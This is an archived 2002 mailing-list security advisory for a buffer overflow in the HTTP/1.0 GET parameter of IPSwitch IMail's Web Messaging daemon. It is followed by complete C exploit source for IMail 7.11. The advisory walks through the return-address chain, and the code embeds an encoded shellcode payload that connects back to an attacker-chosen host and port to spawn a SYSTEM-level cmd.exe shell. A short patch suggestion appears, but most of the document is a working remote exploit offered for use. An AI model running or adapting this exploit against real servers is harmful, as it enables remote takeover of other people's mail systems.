"In 1995, Ipswitch released IMail Server, the first commercial NT Mail Server. Seven years later there are over 49 million users of IMail worldwide. IMail Server 7.1 Greater security, improved usability, and new revenue opportunities for service providers." 7 years in development, 20 minutes of BuffSex v0.3(tm), 3 remote 'root' holes 2c79cbe14ac7d0b8472d3f129fa1df55 Security Advisory #5 #PRODUCT IPSwitch IMail, All Versions #VULNERABILITY there is an overflow present in the GET parameter under the HTTP/1.0 specification in the Web Messaging daemon in all IMail versions to date.. HTTP/0.9 & HTTP/1.1 are not vulnerable, as they have been fixed in a previous bug report.. oops, forgot one :> #EXPLOITATION <96 bytes><EBP><EIP> choosing right causes no problems, soooo.... as none of the registers point to our payload on ret some trickery is necessary to hit our payload in a dynamic way.. nothing too difficult however esp is 8 bytes from our payload, but it has to run right over our chosen ret (call/jmp esp).. so flat out jmping esp has some shitty near-impossible odds working against it.. so we need to do some sex first execution flow: eip overran, ret (esp-4) -> (imailsec.dll) land at pop ebx, ret10 (esp-18) -> (imailsec.dll) call esp after only 3 redirections we've now got esp pointing at our corrupted payload.. YUMMY! preserve esp -> sub esp -> jmp esp we preserve esp to prevent our stack from running right over our code, then we jump relative to our good payload.. ooohh you know whats coming next recover esp -> execute shell now that the stack is out of the way, we can just let the shit fly.. see attached exploit.. target imail version is 7.11 (HF1 applied or not) #PATCH since this is just a simple buffer overflow (lstrcpya() if I remember correctly?), a simple patch is in order!.. GET argument is now limited to 90 characters, we can assume no more is necessary, as someone else would have found this earlier.. #EOF mailserver #4, more to come.. always, 2c79cbe14ac7d0b8472d3f129fa1df55 __________________________________________________ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com /* imailexp.c July 25th, 2002 IPSwitch IMail 7.11 remote 'SYSTEM' exploit there is an overflow in the GET parameter under the HTTP/1.0 specification in the Web Messaging daemon in all IMail versions to date <96 bytes><EBP><EIP> since none of the registers point to our payload on ret some trickery was necessary to hit our payload in a dynamic way, but nothing difficult.. execution flow: eip overran, ret (esp-4) -> land at pop ebx, ret10 (esp-18) -> call esp reach corrupted payload preserve esp -> sub esp -> jmp esp preserve esp, and jump to good payload recover esp -> execute shell let shit fly "In 1995, Ipswitch released IMail Server, the first commercial NT Mail Server. Seven years later there are over 49 million users of IMail worldwide. IMail Server 7.1 Greater security, improved usability, and new revenue opportunities for service providers." 7 years in development, 20 minutes of BuffSex v0.3(tm), 4 remote 'root' holes 2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55at_private) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/errno.h> #include <unistd.h> // dark spyrit's shell as per usual.. queerly modified to call ExitThread // yet again.. all that shit on top is to get us home unsigned char payload[] = "\x47\x45\x54\x20\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x24\x01\x10\x90\x90\x90\x90\x13\xf7\x02\x10" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x8b\xfc\x81\xc4\x11\x11\x11\x11\x81\xec" "\x50\xdd\x10\x11\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x8b\xe7\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90" "\x8b\xc5\x33\xc9\x66\xb9\xdb\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95" "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95" "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3" "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa" "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91" "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6" "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56" "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55" "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95" "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95" "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5" "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18" "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a" "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14" "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2" "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14" "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2" "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd" "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5" "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d" "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94" "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3" "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15" "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a" "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0" "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd" "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1" "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e" "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4" "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6" "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7" "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6" "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0" "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1" "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2" "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95" "\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95" "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6" "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0" "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb" "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb" "\xf0\xed\xf0\x95\xc9\x1d\xdc\x95\x20\x48\x54\x54\x50\x2F\x31\x2E\x30\x0d" "\x0a\x0d\x0a"; main(char argc, char **argv){ unsigned long ah; unsigned short int ap; int fd, i; int bufsize = 1024; int *buffer = (int *)malloc(bufsize); struct sockaddr_in sin; struct hostent *he; struct in_addr in; printf("IMail 7.11 remote exploit (SYSTEM level)\n"); printf("2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55at_private)\n\n"); if (argc < 5){ printf("usage: %s <targethost> <iwebport> <localhost> <localport>\n\n", argv[0]); printf("iwebport: IMail Web Messaging port (default 8383)\n\n"); exit(-1); } ap = htons(atoi(argv[4])); ap ^= 0x9595; if ((he = gethostbyname(argv[3])) == 0){herror(argv[2]);exit(-1);} ah = *((unsigned long *)he->h_addr); ah ^= 0x95959595; payload[747] = ((ap) & 0xff); payload[748] = ((ap >> 8) & 0xff); payload[752] = ((ah) & 0xff); payload[753] = ((ah >> 8) & 0xff); payload[754] = ((ah >> 16) & 0xff); payload[755] = ((ah >> 24) & 0xff); if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);} if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);} else if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve host");exit(-1);} sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(inet_ntoa(in)); sin.sin_port = htons(atoi(argv[2])); printf("ret: 0x10012490 (IMailsec.dll v.2.6.17.28)\n\n"); printf("connecting..."); if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("connection error");exit(-1);} printf("done.\n"); sleep(1); printf("dumping payload..."); if(write(fd, payload, strlen(payload)) < strlen(payload)){perror("write error");exit(-1);} printf("done.\n\n"); printf("cmd.exe spawned to [%s:%s]\n\n", argv[3], argv[4]); close(fd); }
This archive was generated by hypermail 2b30 : Fri Jul 26 2002 - 07:24:27 PDT